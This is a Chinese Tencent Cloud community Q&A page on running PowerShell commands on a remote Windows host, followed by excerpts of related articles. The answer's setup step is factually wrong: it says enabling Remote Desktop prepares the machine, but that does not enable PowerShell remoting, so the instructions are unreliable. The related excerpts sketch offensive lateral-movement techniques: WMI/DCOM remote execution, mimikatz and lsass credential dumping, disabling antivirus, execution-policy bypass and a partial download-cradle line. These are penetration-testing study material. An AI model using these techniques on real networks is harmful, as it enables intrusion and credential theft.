开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

如何在远程windows上运行powershell获取远程windows结果而不是本地结果

在远程Windows上运行PowerShell并获取远程Windows的结果，而不是本地结果，可以通过以下步骤实现：

配置远程Windows机器：确保远程Windows机器已启用远程管理功能。可以通过以下步骤进行配置：
- 在远程Windows机器上，打开“控制面板”。
- 选择“系统和安全”。
- 选择“系统”。
- 在左侧面板中，选择“远程设置”。
- 在“远程桌面”部分，选择“允许远程连接到此计算机”。
- 确保选择了适当的远程连接选项（如“仅限于使用网络级别身份验证的计算机”）。
- 点击“确定”保存更改。
在本地Windows机器上运行PowerShell命令：在本地Windows机器上，打开PowerShell终端，并执行以下命令：$session = New-PSSession -ComputerName 远程计算机名 -Credential 用户名 Invoke-Command -Session $session -ScriptBlock { 远程命令 } Remove-PSSession $session
- 将“远程计算机名”替换为远程Windows机器的名称或IP地址。
- 将“用户名”替换为具有远程访问权限的有效用户名。
- 将“远程命令”替换为要在远程Windows机器上运行的PowerShell命令。
获取远程Windows的结果：执行上述命令后，将会在本地Windows机器上获取远程Windows的结果。可以通过以下方式处理结果：
- 如果远程命令返回文本结果，可以将结果保存到变量中，并在本地Windows机器上进行处理。
- 如果远程命令返回对象结果，可以使用本地Windows机器上的PowerShell命令进行处理，如选择特定属性、过滤结果等。

需要注意的是，为了确保安全性，建议使用安全的远程连接方式（如使用证书进行身份验证）并限制远程访问权限。此外，还可以使用腾讯云的云服务器（CVM）作为远程Windows机器，并结合腾讯云的云监控、云安全等产品来增强远程Windows机器的管理和安全性。

腾讯云相关产品和产品介绍链接地址：

云服务器（CVM）：https://cloud.tencent.com/product/cvm
云监控：https://cloud.tencent.com/product/monitor
云安全：https://cloud.tencent.com/product/safety

相关搜索:使用WinRM在远程Windows服务器上运行PowerShell脚本如何在无头远程Linux服务器上运行应用程序并查看本地Windows计算机上的UI Mongodb Compass连接到本地数据库，而不是连接到本地运行在EC2实例上的远程数据库在Windows上运行Oracle XE 18c : Oracle Home用户或预先存在的域用户，而不是本地虚拟帐户？深度学习产品升级企业认证 slb黑名单 suse更新什么是国际化设置企业别名

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

PS命令之操作系统远程管理及进程服务操作示例

Tips : Windows Server 平台上默认启用PowerShell远程处理, 通常不允许在计算机位于公用网络上时在Windows客户端版本上启用PowerShell远程处理，但是您可以使用SkipNetworkProfileCheck...-Force # 在计算机位于公用网络上时在Windows客户端版本上启用PowerShell远程处理 # 在此计算机上设置了 WinRM 以接收请求。...# 2.如何在Windows操作系统的客户端版本上允许从公共网络进行远程访问,对于不同版本的Windows，防火墙规则的名称可能不同; # NetSecurity模块中的Set-NetFirewallRulecmdlet...该cmdlet阻止对本地计算机上所有PowerShell版本和更高会话会话配置的远程访问,同样需要使用“以管理员身份运行” 选项启动。...Start-Process 命令 - 启动在本地计算机或远程计算机未运行进程 Stop-Process 命令 - 停止在本地计算机或远程计算机上运行的进程 Wait-Process 命令 - 使在本地计算机或远程计算机上运行的进程等待

7.3K4 0

Ansible玩转Windows自动化

PowerShell，今天我们先说PowerShell，因为windows原生自带PowerShell，而ssh的方式需要在被控机安装openssh来进行通信在管理机必须预安装Python的Winrm...模块，方可和远程Windows主机正常通信，但PowerShell需3.0+版本且Management Framework 3.0+版本，实测Windows Server 2012和Windows Server...服务 Ansible管理机部署安装目前,只要机器上安装了 Python 2.6 或 Python 2.7 (windows系统不可以做控制主机),都可以运行Ansible....Windows系统配置和Linux发版版稍有区别，远程主机系统如为Windows需预先如下配置： Framework 3.0+ 更改powershell策略为remotesigned PowerShell...=absent" 返回结果： 192.168.1.105 | success >> { "changed": true} 至此，环境搭建完成，可以在本地远程控制windows服务器，如果想要自动部署

3.4K2 0

渗透测试 | 内网信息收集

使用解析出来的IP地址进行对比，判断域控制器和DNS服务器是否在同一台服务器上，如下图所示： ? ###查看系统详细信息执行如下命令，来查看系统信息，如结果所示，域即域名，登录服务器为域控制器。...cscript c:\windows\temp\1.vbs 该命令默认会把扫描结果写到C:\Windows\Temp\Result.txt 文件中，相对而言速度很慢，不是很推荐，如下图所示： ?...因为这些查询命令本质上都是通过LDAP协议去域控制器上查询的，查询时候需要经过权限认证，只有域用户才有这个权限，所以本地用户是无法运行以下命令的（system 权限用户除外。...3、psloggedon.exe 在Windows中，可以使用命令“net session”查看谁在本地计算机上使用了资源，但是没有命令用来查看谁在使用远程计算机的资源、谁登录了本地或远程计算机。...如果指定了用户名而不是计算机，psloggedon.exe会搜索网络邻居中的计算机，并显示该用户当前是否已登录，其原理是通过检验注册表里HKEY_USERS项的key值来查询谁登录过机器（同样调用了NetSessionEnum

3.1K2 0

红队技巧-常规横向手法

实操 1.ICP Ipc（共享命名管道），其作用是为了实现进程间通信而开放的命名管道。ipc可以通过用户名和密码建立ipc链接，获取相应的用户权限。...，用于管理本地或远程的Windows系统，攻击者使用wmi来进行攻击，但Windows系统默认不会再日志中记录这些操作，可以做到无日志，攻击脚本无需写入到磁盘，增加了隐蔽性。...5.通过FSO组件访问远程共享文件夹中的结果文件，将结果输出。 6.当结果读取完成时，调用WMI执行命令删除结果文件，最后当WMIEXEC退出时，删除文件共享。...，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特WMI允许脚本语言（例如VBScript或Windows PowerShell）在本地和远程管理...在powershell中我们可以使用 get-CimInstance来列出本地COM程序列表远程DCOM对象的实例表现如下：客户端计算机从远程计算机请求实例化由CLSID表示的对象。

2.1K2 0

内网渗透基石篇--域内横向移动分析及防御

此时，可以使用命令行的方式连接主机（最好使用windows自带的方法对远程目标系统进行命令行下的操作） IPC IPC 共享”命名通道”的资源，是为了实现进程间通信而开发的命名通道。...利用这个连接，不仅可以访问，目录机器中的文件，进行上传，下载等操作，还可以在目标机器上运行其他命令，以获取目标机器的目录结构、用户列表等信息。...对散列值进行DUmp操作 7.使用Powershell远程加载mimikatz抓取散列值和明文密码 3.单机密码抓取的防范方法安装微软发布的KB2871997补丁关闭Wdigest功能（Windows...Server 2012版本以上默认关闭） 1.使用reg add命令 2.使用powershell 三、使用hashcat获取密码 kali rolling自带的密码破解工具，支持破解windows...aes256:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx 注意事项： dir后跟要使用的主机名，而不是ip地址。

2.9K6 2

自动化运维利器Ansible要点汇总

部署Ansible的控制机需要python 2.7及以上，需要安装paramiko模块、PyYAML、Jinja2、httplib2等模块，若被管节点为windows，则需要有powershell3并制授权远程管理...、raw、script执行shell命令 copy：复制文件到远程主机，可以改权限等 file设置文件目录属性等 fetch 从远程某主机获取文件到本地 service 服务程序管理，启动停止重启服务等操作...host_port.cmd }}" # 引用方式一 msg: "{{ host_port['stdout_lines'] }}" # 引用方式二 connection: local 　　在本地服务器上运行命令...，而不是SSH - name: 创建 aggregator proxy证书签名请求 template: src=aggregator-proxy-csr.json.j2 dest=/ssl/aggregator-proxy-csr.json...Windows客户端主机开启Winrm服务，PowerShell需3.0+版本且Management Framework 3.0+版本，实测Windows 7 SP1和Windows Server 2008

2K3 0

网络安全自学篇（十九）| Powershell基础入门及常见用法（一）

传统的CMD支持脚本编写，但扩展性不好，而Powershell类似于Linux shell，具有更好的远程处理、工作流、可更新的帮助、预定任务（Scheduled Job）、CIM等优点。...管道并不是什么新事物，以前的Cmd控制台也有重定向的命令，例如Dir | More可以将结果分屏显示。传统的Cmd管道是基于文本的，但是Powershell管道是基于对象。例如： ? ?...如果两个 >> 它会在原来的基础上，再进行补充（类似 a+），而单个大于号是删除原来的写入（类似 w）。 ? 输出结果如下图所示。 ? ?...运行命令打开： ? ? (2) 定义一个demo.vbs文件，内容如下： ? 运行命令打开： ? ? (3) 运行Powershell脚本文件也类似。 ? 运行结果如下图所示： ? ?...那么，如何在CMD中运行Powershell文件呢？我们将demo.bat修改为如下内容，其中&表示运行。 ? ? 运行命令： ? 下面方法也可以直接运行 ? ? ?

8.1K3 0

域内横向移动分析及防御

之前也有过一些学习：内网渗透系列：横向渗透方法小结一、常用Windows远程连接和命令 1、IPC IPC（Internet Process Connection）是为了实现进程间通信而开放的命名管道...PsExec的基本原理是：通过管道在远程目标计算机上创建一个psexec服务，并在本地磁盘中生成一个名为“PSEXECSVC”的二进制文件，然后通过psexec服务运行命令，运行结束后删除任务需要远程系统开启...执行命令 1、通过本地DCOM执行命令获取DCOM程序列表： // Get-CimInstance在PowerShell 3.0上才有，即server2012及以上 Get-CimInstance...PowerShell-AD-Recon工具包提供了一系列服务与服务登录账号和运行服务的主机之间的对应关系，下载地址： https://github.com/PyroTek3/PowerShell-AD-Recon...对其进行本地或远程操作。

1.6K1 1

ATT&CK视角下的红蓝对抗:二十二.横向移动之利用RDP进行横向渗透

这种连接允许远程用户在其本地计算机上看到并控制另一台电脑的桌面界面。这在远程工作、IT支持和远程系统管理中非常有用，本篇文章主要针对了RDP（远程桌面协议）在横向移动中的进行了介绍。...该模式是Windows中的一个功能，当用户登录到一台已知被控主机时，它可以保护密码不会被保存在被控主机的内存中，但是更改了远程桌面协议，使用的是网络登录而不是交互式登录，从而导致用户可以使用NTLM哈希或者...如果当前用户已经是管理员权限并且不被UAC限制，则可以通过伪造Token的方式去获取System权限，并使用tscon切换会话，执行结果如图1-9所示，运行tscon命令后将会切换至tscon用户的RDP...首先使用命令privilege::debug获取debug权限，然后执行ts::sessions命令列出当前Windows上的用户会话，如图1-10所示。...使用命令执行结果如图1-14所示。而从图1-15中可以看出，目标已经成功执行指定的Powershell脚本。

9214 0

windows: 解决WinRM远程会话中的第二跳认证问题

在Windows环境中进行远程管理时，确实可能会遇到所谓的“双跳”问题。当我们从一个机器（A）远程连接到另一个机器（B），然后再试图从机器B连接到第三个机器（C），这种情况被称为“双跳”。...为解决此问题，可以使用PowerShell的CredSSP（凭据安全服务提供程序）认证。CredSSP允许我们的凭据从本地机器传递到远程服务器，然后再传递到第三方服务器。...启用CredSSP 首先，需要在本地机器和远程服务器上启用CredSSP。...请以管理员身份运行PowerShell，然后执行以下命令：在本地机器上： Enable-WSManCredSSP -Role Client -DelegateComputer "远程服务器地址"...再次尝试执行命令在成功连接到远程服务器后，我们应该能够成功执行需要二次跳跃的命令，如Set-ADAccountPassword命令，而不会遇到错误： Set-ADAccountPassword -Identity

3083 0

内网渗透测试：利用DCOM进行横向渗透

COM是许多微软产品和技术，如Windows媒体播放器和Windows Server的基础。一般的对象是由数据成员和作用在其上的方法组成，而组件对象和一般对象虽有相似性，但又有较大不同。...DCOM DCOM（分布式组件对象模型）是微软基于组件对象模型（COM）的一系列概念和程序接口，它支持不同的两台机器上的组件间的通信，不论它们是运行在局域网、广域网、还是Internet上。...获取本地DCOM程序列表在powershell中执行如下命令获取DCOM程序列表： Get-CimInstance Win32_DCOMApplication Get-CimInstance 这个cmdle...我们通过MMC20.Application的ExecuteShellCommand方法在本地运行了一个“计算器”程序。...最后进入Windows7的powershell，控制Windows7对Windows Server 2008执行远程命令，执行位于Windows Server 2008的c盘里的马： # 通过PowerShell

2.7K2 0

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

C:\Windows\SysWOW64\WindowsPowerShell\v1.0 传统的CMD支持脚本编写，但扩展性不好，而Powershell类似于Linux shell，具有更好的远程处理、工作流...第一个命令如下： Get-Host 输出结果如下图所示：另一个命令是： $psversiontable 同时，Powershell可以获取计算机的服务详细信息、状态等。...最大的例外是，如果PowerShell脚本文件刚好位于你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如 ....，都采用“动词-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem...\test.ps1 通过增加 -ExecutionPolicy Bypass 实现绕过安全策略，并运行输出结果。本地我们可以看到 test.ps1 文件。

3.2K3 0

抓取域密码哈希的各种工具集合

这些密码哈希存储在域控制器（NTDS.DIT）中的数据库文件中，并包含一些附加信息，如组成员和用户。 NTDS.DIT 文件经常被操作系统使用，因此不能直接复制到另一个位置提取信息。...Empire PowerShell Empire 有两个模块可以通过 DCSync 获取域内哈希。这两个模块都需要以域管理员的权限执行。...vssadmin vssadmin 是一个 Windows 命令行实用程序，管理员能够使用它备份计算机、卷和文件。Volume Shadow Copy作为服务运行，要求文件系统为 NTFS 格式。...，则可以在本地或远程执行。...在执行期间，fgdump 将尝试禁用可能在系统上运行的防病毒软件，如果成功禁用则将结果保存在文件中，如果失败，则不进行提取，防止被检测，使用方法直接在域控上运行即可： fgdump.exe ?

2.2K5 0

四十六.Powershell和PowerSploit脚本攻防万字详解

C:\Windows\SysWOW64\WindowsPowerShell\v1.0 传统的CMD支持脚本编写，但扩展性不好，而Powershell类似于Linux shell，具有更好的远程处理、工作流...第一个命令如下： Get-Host 输出结果如下图所示：另一个命令是： $psversiontable 同时，Powershell可以获取计算机的服务详细信息、状态等。...最大的例外是，如果PowerShell脚本文件刚好位于你的系统目录中，那么在命令提示符后直接键入脚本文件名即可运行，如 ....-名词”的形式，如New-Item，动词部分一般为Add、New、Get、Remove、Set等，命名的别名一般兼容Windows Command和Linux Shell，如Get-ChildItem命令使用...\test.ps1 通过增加 -ExecutionPolicy Bypass 实现绕过安全策略，并运行输出结果。本地我们可以看到 test.ps1 文件。

6621 0

(3)Powershell基础知识(一)

面向对象虽然可以通过以文本方式键入命令与 PowerShell 进行交互，但 Windows PowerShell是基于对象的，而不是基于文本的。意味着Powershell命令的输出即为对象。...因此，Windows PowerShell 为曾使用过其他 shell的人员提供了熟悉的界面，同时引入了新的、功能强大的命令行范例。通过允许发送对象（而不是文本），它扩展了在命令之间发送数据的概念。...命令不是基于文本的，是基于.Net对象的与传统的命令(如perl,bat,cmd,bash等)不同，Powershell可处理对象(结构化的信息)，而不只是显示在屏幕上的字符串，命令输出始终提供可能会需要的额外信息...即使是在 PowerShell 中运行传统命令行工具，也可以使用 PowerShell 的帮助功能。PowerShell 将对参数进行处理并将结果传递给外部工具。...中的可发现，一致性，面向对象等特性 Powershell是基于.Net对象，而不是基于文本的。

4.1K2 0

内网渗透｜利用 WinRM 进行横向渗透

前言 WinRM 作为 Windows 操作系统的一部分，是一项允许管理员在系统上远程执行管理任务的服务。这样的服务当然不会被攻击者错过，本篇文章我们就来讲讲 WinRM 在横向渗透中的使用。...WinRM 作为 Windows 操作系统的一部分，是一项允许管理员在系统上远程执行管理任务的服务。...在现代 Windows 系统中，WinRM HTTP 通过 TCP 端口 5985 进行通信，而 HTTPS（TLS）通过 TCP 端口 5986 进行通信。...calc 进程： image-20210804214037070 使用 Invoke-Command 命令 Invoke-Command 是 PowerShell 上的一个命令，用来在本地或远程计算机上执行命令...上直接启动一个与远程主机的交互式会话。

5.2K4 0

内网渗透 | 横向移动总结

注意：对于运行时间较长的命令，例如ping、systeminfo等，需要添加-wait 5000或更长时间的参数。由于正常的命令都要查看结果，所以执行的命令后面都会加上重定向符，把结果输出到文件中。...所以wmiexec.vbs在运行nc反弹shell或者msf木马木马等不需要输出结果但需要一直运行的程序时，因为木马进程会一直存在，导致结果文件被占用，不能删除，也不能改写。...当命令加了“-persist” 选项后，程序会在后台运行，不会有结果输出，而且会返回这个命令进程的PID，方便结束进程。...COM是许多微软产品和技术，如Windows媒体播放器和Windows Server的基础。一般的对象是由数据成员和作用在其上的方法组成，而组件对象和一般对象虽有相似性，但又有较大不同。...PTK(pass the key) 在连接配置的时候允许使用hash进行认证，而不是只有账号密码才能认证。

3.8K2 0

如何在远程系统执行程序

条件：启动Task Scheduler服务 2、psexec PsTools工具之一，在指定的一台或多台计算机上运行应用程序条件：需要开放ADMIN$共享 3、WMIC 功能强大，可做系统管理、远程主机信息获取...，基本上psexec能用的地方，这个脚本也能够使用。...条件：启动WMI服务，开放135端口本地安全策略的“网络访问: 本地账户的共享和安全模式”应设为“经典-本地用户以自己的身份验证” 5、powershell remoting 实现在目标主机远程执行程序后...* -Force 设置允许运行ps1文件 powershell Set-ExecutionPolicy Unrestricted执行test.ps1文件 powershell -ExecutionPolicy...Management Instrumentation服务关闭,关闭135端口无法使用wmic、wmiexec 4、不支持3389 那么，如何在目标主机远程执行程序？

1.6K2 0

远程dump lsass.exe内存并解析

原理分析首先我们来看下lsassy是如何在对方机器上执行命令的，我们看下其目录： ? 跟入wmic.py ： ?...根据代码提示判断应该是调用wmi在远程机器上执行了命令。...第二，我们需要看下如何dump进程的，分析代码，发现是利用两种方法： 1、 powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows...-x whoami 工具运行会出现如下提示： ?...根据提示，发现CrackMapExec是在本地监听445接收管道传过来的值： ? 利用wireshark抓包也可以看到： ? 小结以上只是个人的一些臆想，如有错误，跪求指正！

2.7K2 0

WMI利用(横向移动)

信息收集注意：信息收集需要根据实际场景来进行收集，而不是说笔者罗列的就是必须要做，WMI可以做的信息收集操作远不至笔者罗列的如此，希望同学能够举一反三，自由搭配，参考微软官方文档，根据实际情况获取所需...作为载荷在客户机上执行wmic命令，让指定机器上线CS · XSL 如下为普通的xsl恶意文件，我们可以在下例中修改Run()中的Payload，本地运行恶意程序或者远程使用Powershell..."c:\windows\system32\calc.exe" "c:\calc" ###文件下载：将远程主机calc.exe下载到本地c:\calc.exe cscript wmihacker_0.6...."win16" 域内获取半交互式shell #将本地calc.exe复制到远程主机c:\calc.exe cscript wmihacker_0.6.vbs /upload 192.168.8.179...$Remote.PayloadOutput #将执行结果输出到屏幕上 #####---------------------------##### IEX(New-Object Net.Webclient

2.8K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭